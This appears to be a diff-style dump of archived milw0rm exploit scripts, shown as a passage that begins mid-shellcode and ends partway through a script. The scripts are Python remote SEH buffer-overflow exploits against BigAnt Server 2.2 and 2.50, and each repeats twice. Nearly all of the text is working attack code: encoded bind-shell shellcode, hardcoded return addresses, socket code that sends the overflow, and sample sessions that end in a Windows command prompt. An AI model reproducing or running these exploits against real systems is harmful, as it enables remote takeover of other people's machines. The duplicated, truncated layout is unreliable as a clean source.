"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
|
||||
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
|
||||
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
|
||||
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
|
||||
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
|
||||
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
|
||||
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
|
||||
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
|
||||
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
|
||||
)
|
||||
|
||||
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
|
||||
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
|
||||
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
|
||||
'C'*1225
|
||||
print '[+] Connecting to host...'
|
||||
s = socket(AF_INET, SOCK_STREAM)
|
||||
# s.connect(('192.168.1.195', 6080))
|
||||
s.connect((HOST, PORT))
|
||||
print '[+] Overflowing the buffer...'
|
||||
s.send('GET ' + evilbuf + "\n\n")
|
||||
s.close()
|
||||
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
|
||||
|
||||
# milw0rm.com [2008-04-15]
|
||||
#!/usr/bin/python
|
||||
###############################################################################
|
||||
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
|
||||
# Matteo Memelli aka ryujin
|
||||
# www.be4mind.com - www.gray-world.net
|
||||
# 04/13/2008
|
||||
# Tested on Windows 2000 Sp4 English
|
||||
# Vulnerable process is AntServer.exe
|
||||
# Offset for SEH overwrite is 954 Bytes
|
||||
#
|
||||
#------------------------------------------------------------------------------
|
||||
# muts you gave me the wrong pill! it's your fault!!!
|
||||
# I wanna go back to the matrix
|
||||
#------------------------------------------------------------------------------
|
||||
#
|
||||
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
|
||||
# [+] Connecting to host...
|
||||
# [+] Overflowing the buffer...
|
||||
# [+] Done! Check your shell on 192.168.1.195:6080
|
||||
# bt ~ # nc -vv 192.168.1.195 4444
|
||||
# 192.168.1.195: inverse host lookup failed: Unknown host
|
||||
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
|
||||
# Microsoft Windows 2000 [Version 5.00.2195]
|
||||
# (C) Copyright 1985-2000 Microsoft Corp.
|
||||
#
|
||||
# C:\WINNT\system32>
|
||||
#
|
||||
###############################################################################
|
||||
from socket import *
|
||||
from optparse import OptionParser
|
||||
import sys
|
||||
|
||||
print "[*********************************************************************]"
|
||||
print "[* *]"
|
||||
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
|
||||
print "[* Discovered and Coded By *]"
|
||||
print "[* Matteo Memelli *]"
|
||||
print "[* (ryujin) *]"
|
||||
print "[* www.be4mind.com - www.gray-world.net *]"
|
||||
print "[* *]"
|
||||
print "[*********************************************************************]"
|
||||
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-H", "--target_host", type="string",
|
||||
action="store", dest="HOST",
|
||||
help="Target Host")
|
||||
parser.add_option("-P", "--target_port", type="int",
|
||||
action="store", dest="PORT",
|
||||
help="Target Port")
|
||||
(options, args) = parser.parse_args()
|
||||
HOST = options.HOST
|
||||
PORT = options.PORT
|
||||
if not (HOST and PORT):
|
||||
parser.print_help()
|
||||
sys.exit()
|
||||
|
||||
# Tried with SEH/THREAD/PROCESS but server crashes anyway
|
||||
# [*] x86/alpha_mixed succeeded, final size 698 SEH
|
||||
shellcode = (
|
||||
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
|
||||
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
|
||||
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
|
||||
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
|
||||
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
|
||||
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
|
||||
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
|
||||
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
|
||||
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
|
||||
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
|
||||
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
|
||||
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
|
||||
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
|
||||
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
|
||||
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
|
||||
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
|
||||
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
|
||||
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
|
||||
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
|
||||
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
|
||||
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
|
||||
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
|
||||
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
|
||||
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
|
||||
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
|
||||
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
|
||||
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
|
||||
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
|
||||
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
|
||||
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
|
||||
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
|
||||
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
|
||||
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
|
||||
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
|
||||
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
|
||||
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
|
||||
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
|
||||
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
|
||||
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
|
||||
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
|
||||
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
|
||||
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
|
||||
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
|
||||
)
|
||||
|
||||
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
|
||||
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
|
||||
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
|
||||
'C'*1225
|
||||
print '[+] Connecting to host...'
|
||||
s = socket(AF_INET, SOCK_STREAM)
|
||||
# s.connect(('192.168.1.195', 6080))
|
||||
s.connect((HOST, PORT))
|
||||
print '[+] Overflowing the buffer...'
|
||||
s.send('GET ' + evilbuf + "\n\n")
|
||||
s.close()
|
||||
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
|
||||
|
||||
# milw0rm.com [2008-04-15]
|
||||
|
|
|
@ -1,106 +1,106 @@
|
|||
#!/usr/bin/python
|
||||
# BigAnt Server version 2.50 SEH Overwrite - 0day
|
||||
# Written and discovered by Blake
|
||||
# Tested on Windows XP SP3
|
||||
#
|
||||
# $ ./bigant.py 192.168.1.131 6660
|
||||
#
|
||||
# [*] BigAnt Server v2.50 SEH Overwrite 0day
|
||||
# [*] Written and discovered by Blake
|
||||
# [*] Tested on Windows XP SP3
|
||||
#
|
||||
# [+] Connecting to 192.168.1.131 on port 6660
|
||||
# [+] Sending payload
|
||||
# [+] Connect to bind shell on port 4444
|
||||
#
|
||||
# $ nc 192.168.1.131 4444
|
||||
# Microsoft Windows XP [Version 5.1.2600]
|
||||
# (C) Copyright 1985-2001 Microsoft Corp.
|
||||
#
|
||||
# C:\WINDOWS\system32>
|
||||
|
||||
import socket, sys
|
||||
|
||||
if len(sys.argv)!= 3:
|
||||
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # port 6660 by default
|
||||
|
||||
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
|
||||
# EXITFUNC=seh, LPORT=4444, RHOST=
|
||||
shellcode = (
|
||||
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
|
||||
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
|
||||
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
|
||||
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
|
||||
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
|
||||
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
|
||||
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
|
||||
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
|
||||
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
|
||||
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
|
||||
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
|
||||
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
|
||||
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
|
||||
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
|
||||
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
|
||||
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
|
||||
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
|
||||
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
|
||||
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
|
||||
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
|
||||
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
|
||||
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
|
||||
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
|
||||
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
|
||||
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
|
||||
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
|
||||
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
|
||||
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
|
||||
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
|
||||
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
|
||||
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
|
||||
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
|
||||
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
|
||||
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
|
||||
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
|
||||
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
|
||||
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
|
||||
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
|
||||
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
|
||||
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
|
||||
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
|
||||
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
|
||||
"\x4b\x4f\x4e\x30\x41\x41")
|
||||
|
||||
|
||||
payload = "\x41" * 985 # seh overwritten at 989
|
||||
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
|
||||
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
|
||||
nops = "\x90" * 10 # nop sled
|
||||
sc = shellcode # 710 bytes available for shellcode
|
||||
|
||||
print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
|
||||
print "[*] Written and discovered by Blake"
|
||||
print "[*] Tested on Windows XP SP3\n"
|
||||
|
||||
print "[+] Connecting to %s on port %d" % (host,port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
s.connect((host,port))
|
||||
except:
|
||||
print "[x] Error establishing connection\n"
|
||||
sys.exit(0)
|
||||
|
||||
print "[+] Sending payload"
|
||||
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
|
||||
s.close()
|
||||
print "[+] Connect to bind shell on port 4444\n"
|
||||
|
||||
# milw0rm.com [2009-09-15]
|
||||
#!/usr/bin/python
|
||||
# BigAnt Server version 2.50 SEH Overwrite - 0day
|
||||
# Written and discovered by Blake
|
||||
# Tested on Windows XP SP3
|
||||
#
|
||||
# $ ./bigant.py 192.168.1.131 6660
|
||||
#
|
||||
# [*] BigAnt Server v2.50 SEH Overwrite 0day
|
||||
# [*] Written and discovered by Blake
|
||||
# [*] Tested on Windows XP SP3
|
||||
#
|
||||
# [+] Connecting to 192.168.1.131 on port 6660
|
||||
# [+] Sending payload
|
||||
# [+] Connect to bind shell on port 4444
|
||||
#
|
||||
# $ nc 192.168.1.131 4444
|
||||
# Microsoft Windows XP [Version 5.1.2600]
|
||||
# (C) Copyright 1985-2001 Microsoft Corp.
|
||||
#
|
||||
# C:\WINDOWS\system32>
|
||||
|
||||
import socket, sys
|
||||
|
||||
if len(sys.argv)!= 3:
|
||||
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # port 6660 by default
|
||||
|
||||
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
|
||||
# EXITFUNC=seh, LPORT=4444, RHOST=
|
||||
shellcode = (
|
||||
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
|
||||
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
|
||||
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
|
||||
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
|
||||
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
|
||||
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
|
||||
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
|
||||
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
|
||||
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
|
||||
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
|
||||
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
|
||||
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
|
||||
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
|
||||
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
|
||||
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
|
||||
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
|
||||
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
|
||||
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
|
||||
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
|
||||
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
|
||||
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
|
||||
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
|
||||
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
|
||||
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
|
||||
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
|
||||
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
|
||||
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
|
||||
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
|
||||
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
|
||||
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
|
||||
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
|
||||
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
|
||||
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
|
||||
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
|
||||
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
|
||||
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
|
||||
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
|
||||
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
|
||||
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
|
||||
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
|
||||
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
|
||||
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
|
||||
"\x4b\x4f\x4e\x30\x41\x41")
|
||||
|
||||
|
||||
payload = "\x41" * 985 # seh overwritten at 989
|
||||
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
|
||||
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
|
||||
nops = "\x90" * 10 # nop sled
|
||||
sc = shellcode # 710 bytes available for shellcode
|
||||
|
||||
print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
|
||||
print "[*] Written and discovered by Blake"
|
||||
print "[*] Tested on Windows XP SP3\n"
|
||||
|
||||
print "[+] Connecting to %s on port %d" % (host,port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
s.connect((host,port))
|
||||
except:
|
||||
print "[x] Error establishing connection\n"
|
||||
sys.exit(0)
|
||||
|
||||
print "[+] Sending payload"
|
||||
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
|
||||
s.close()
|
||||
print "[+] Connect to bind shell on port 4444\n"
|
||||
|
||||
# milw0rm.com [2009-09-15]
|
||||
|
|
|
@ -1,62 +1,62 @@
|
|||
#!/usr/bin/python
|
||||
# by hack4love
|
||||
# BigAnt Server version 2.50 SEH Overwrite Universal
|
||||
# discovered by Blake http://www.milw0rm.com/exploits/9673
|
||||
# Tested on Windows XP SP2
|
||||
# gratez to Blake
|
||||
# use >> bigant.py 192.168.1.12 6660
|
||||
|
||||
|
||||
import socket, sys
|
||||
|
||||
if len(sys.argv)!= 3:
|
||||
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # port 6660 by default
|
||||
|
||||
|
||||
shellcode = (
|
||||
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
|
||||
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
|
||||
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
|
||||
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
|
||||
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
|
||||
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
|
||||
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
|
||||
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
|
||||
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
|
||||
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
|
||||
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
|
||||
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
|
||||
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
|
||||
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
|
||||
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
|
||||
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
|
||||
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
|
||||
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
|
||||
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
|
||||
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
|
||||
|
||||
|
||||
payload = "\x41" * 985
|
||||
next_seh = "\xeb\x06\x90\x90"
|
||||
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
|
||||
nops = "\x90" * 10
|
||||
sec = shellcode
|
||||
|
||||
print "[+] Connecting to %s on port %d" % (host,port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
s.connect((host,port))
|
||||
except:
|
||||
print "[x] Error establishing connection\n"
|
||||
sys.exit(0)
|
||||
|
||||
print "[+] Sending payload"
|
||||
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
|
||||
s.close()
|
||||
|
||||
# milw0rm.com [2009-09-15]
|
||||
#!/usr/bin/python
|
||||
# by hack4love
|
||||
# BigAnt Server version 2.50 SEH Overwrite Universal
|
||||
# discovered by Blake http://www.milw0rm.com/exploits/9673
|
||||
# Tested on Windows XP SP2
|
||||
# gratez to Blake
|
||||
# use >> bigant.py 192.168.1.12 6660
|
||||
|
||||
|
||||
import socket, sys
|
||||
|
||||
if len(sys.argv)!= 3:
|
